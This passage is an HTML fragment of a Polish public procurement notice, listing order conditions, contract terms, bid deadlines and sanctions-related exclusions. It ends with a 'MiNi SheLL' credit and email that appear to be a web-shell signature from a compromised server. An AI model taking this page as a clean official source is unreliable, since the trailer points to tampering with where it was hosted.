mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy występujący wspólnie (np. konsorcjum, spółka cywilna, Wykonawcy, którzy zawarli porozumienie), mają<br/>obowiązek ustanowić pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w<br/>niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, chyba że pełnomocnictwo takie wynika z<br/>dołączonych do oferty dokumentów np. umowy konsorcjum lub umowy spółki cywilnej.<br/>Uwaga: pełnomocnictwo musi być udzielone przez wszystkich Wykonawców wchodzących w skład konsorcjum oraz<br/>powinno mieć określony zakres. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umów oraz warunków ich wprowadzenia znajduje się w poszczególnych wzorach umów stanowiących załączniki do SWZ (8a-e). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-31 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-31 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej<br/>Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty<br/>zgodnie z § 4 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający do wykonawcy (Dz. U. poz. 2415).<br/>Z postępowania o udzielenie<br/>zamówienia publicznego prowadzonego na podstawie ustawy Pzp zgodnie z art. 7 ust. 1 ustawy o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego wyklucza się:<br/>1) Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa powyżej,<br/>2) Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa powyżej,<br/>3) Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa powyżej.<br/>Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty<br/>zgodnie z § 4 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający do wykonawcy (Dz. U.<br/>poz. 2415).

Creat By MiNi SheLL
Email: jattceo@gmail.com